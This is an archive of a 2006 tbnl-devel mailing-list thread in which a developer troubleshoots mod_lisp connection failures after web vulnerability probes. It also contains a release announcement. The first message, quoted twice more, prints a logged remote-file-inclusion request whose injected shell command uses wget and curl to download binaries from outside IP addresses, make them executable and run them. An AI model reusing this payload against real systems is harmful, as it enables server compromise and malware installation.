From xach at xach.com  Wed Apr  5 13:47:11 2006
From: xach at xach.com (Zach Beane)
Date: Wed, 5 Apr 2006 09:47:11 -0400
Subject: [tbnl-devel] tbnl/mod_lisp disconnection?
Message-ID: <20060405134711.GT6306@xach.com>

Every now and then I get hit by a sudden probe of various web script
vulnerabilities. The requests look like this:

   POST /xmlrpc/xmlrpc.php
   POST /blogs/xmlsrv/xmlrpc.php
   GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://210.3.4.193/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20http://207.90.211.54/arts;chmod%20744%20arts;./arts;echo%20YYY;echo|

After these things happen, the connection between mod_lisp and tbnl
starts to fail with this message in the apache logs:

   [Wed Apr 05 08:19:50 2006] [error] (70014)End of file found: error reading from Lisp
   [Wed Apr 05 08:19:51 2006] [error] (70014)End of file found: error reading from Lisp

Making requests to the website results in a 500 Internal Server Error.

I have looked at the listener object when this happens, and it seems
to have 10 workers. After a few more requests (all 500 errors), the
worker count drops down, and then suddenly things start working
normally again.

What might be happening with the connection in this situation? Is
there anything in the listener object I can inspect to discover why
the mod_lisp connection is getting EOF?

Zach


From edi at agharta.de  Fri Apr 21 21:05:27 2006
From: edi at agharta.de (Edi Weitz)
Date: Fri, 21 Apr 2006 23:05:27 +0200
Subject: [tbnl-devel] tbnl/mod_lisp disconnection?
In-Reply-To: <20060405134711.GT6306@xach.com> (Zach Beane's message of "Wed,
	5 Apr 2006 09:47:11 -0400")
References: <20060405134711.GT6306@xach.com>
Message-ID: <uzmie1vxk.fsf@agharta.de>

Hi Zach!

On Wed, 5 Apr 2006 09:47:11 -0400, Zach Beane <xach at xach.com> wrote:

> Every now and then I get hit by a sudden probe of various web script
> vulnerabilities. The requests look like this:
>
>    POST /xmlrpc/xmlrpc.php
>    POST /blogs/xmlsrv/xmlrpc.php
>    GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://210.3.4.193/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20http://207.90.211.54/arts;chmod%20744%20arts;./arts;echo%20YYY;echo|
>
> After these things happen, the connection between mod_lisp and tbnl
> starts to fail with this message in the apache logs:
>
>    [Wed Apr 05 08:19:50 2006] [error] (70014)End of file found: error reading from Lisp
>    [Wed Apr 05 08:19:51 2006] [error] (70014)End of file found: error reading from Lisp
>
> Making requests to the website results in a 500 Internal Server Error.
>
> I have looked at the listener object when this happens, and it seems
> to have 10 workers. After a few more requests (all 500 errors), the
> worker count drops down, and then suddenly things start working
> normally again.
>
> What might be happening with the connection in this situation? Is
> there anything in the listener object I can inspect to discover why
> the mod_lisp connection is getting EOF?

Sorry for the loooooong delay.  I'm /really/ busy... :)

Have you made any progress with this?  I've tried to reproduce it (LWL
and Apache 2) but everything worked fine.  Which Lisp are you using?

ATM I don't really have an idea how to tackle this.  Sometimes, when I
was really desperate, I've hacked the mod_lisp C code to debug
problems like this one, but that isn't fun.  Actually, that was one of
the reasons I wrote Hunchentoot...

I'm afraid I can't be more helpful right now.

Cheers,
Edi.


From xach at xach.com  Mon Apr 24 14:01:33 2006
From: xach at xach.com (Zach Beane)
Date: Mon, 24 Apr 2006 10:01:33 -0400
Subject: [tbnl-devel] tbnl/mod_lisp disconnection?
In-Reply-To: <uzmie1vxk.fsf@agharta.de>
References: <20060405134711.GT6306@xach.com> <uzmie1vxk.fsf@agharta.de>
Message-ID: <20060424140133.GT6686@xach.com>

On Fri, Apr 21, 2006 at 11:05:27PM +0200, Edi Weitz wrote:
> Hi Zach!
> 
> On Wed, 5 Apr 2006 09:47:11 -0400, Zach Beane <xach at xach.com> wrote:
> 
> > Every now and then I get hit by a sudden probe of various web script
> > vulnerabilities. The requests look like this:
> >
> >    POST /xmlrpc/xmlrpc.php
> >    POST /blogs/xmlsrv/xmlrpc.php
> >    GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://210.3.4.193/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20http://207.90.211.54/arts;chmod%20744%20arts;./arts;echo%20YYY;echo|
> >
> > After these things happen, the connection between mod_lisp and tbnl
> > starts to fail with this message in the apache logs:
> >
> >    [Wed Apr 05 08:19:50 2006] [error] (70014)End of file found: error reading from Lisp
> >    [Wed Apr 05 08:19:51 2006] [error] (70014)End of file found: error reading from Lisp
> >
> > Making requests to the website results in a 500 Internal Server Error.
> >
> > I have looked at the listener object when this happens, and it seems
> > to have 10 workers. After a few more requests (all 500 errors), the
> > worker count drops down, and then suddenly things start working
> > normally again.
> >
> > What might be happening with the connection in this situation? Is
> > there anything in the listener object I can inspect to discover why
> > the mod_lisp connection is getting EOF?
> 
> Sorry for the loooooong delay.  I'm /really/ busy... :)
> 
> Have you made any progress with this?  I've tried to reproduce it (LWL
> and Apache 2) but everything worked fine.  Which Lisp are you using?

I am using SBCL. I can't reproduce it either; it only seems to happen
after that particular style of attack.

On the other hand, I recently announced a new toy
(http://wigflip.com/saywhat/) and it got a few thousand visitors in a
short period of time. Things wedged a few times in a completely
different style, but again I am unable to reproduce, which makes
troubleshooting very difficult.
 
> ATM I don't really have an idea how to tackle this.  Sometimes, when I
> was really desperate, I've hacked the mod_lisp C code to debug
> problems like this one, but that isn't fun.  Actually, that was one of
> the reasons I wrote Hunchentoot...

I'm thinking of going in a similar direction.

Zach


From edi at agharta.de  Tue Apr 25 20:00:33 2006
From: edi at agharta.de (Edi Weitz)
Date: Tue, 25 Apr 2006 22:00:33 +0200
Subject: [tbnl-devel] New version 0.9.8
Message-ID: <u3bg1h1cu.fsf@agharta.de>

ChangeLog:

  Version 0.9.8
  2006-04-25
  For mod_lisp, Lisp-Content-Length header must be sent after Content-Length header

Download:

  <http://weitz.de/files/tbnl.tar.gz>

Cheers,
Edi.


From stesch at no-spoon.de  Sun Apr 30 13:21:51 2006
From: stesch at no-spoon.de (Stefan Scholl)
Date: Sun, 30 Apr 2006 15:21:51 +0200
Subject: [tbnl-devel] tbnl freeze
In-Reply-To: <7CB63559-7190-47EC-B242-7A3F9ABD13DB@gmail.com>
References: <7CB63559-7190-47EC-B242-7A3F9ABD13DB@gmail.com>
Message-ID: <20060430132151.GL13092@parsec.no-spoon.de>

On 2005-08-09 00:01:33, Steve Huffman wrote:
> I'm working on reddit.com, which uses TBNL as its web framework. For  

OK, say, what was your solution to this problem? :-)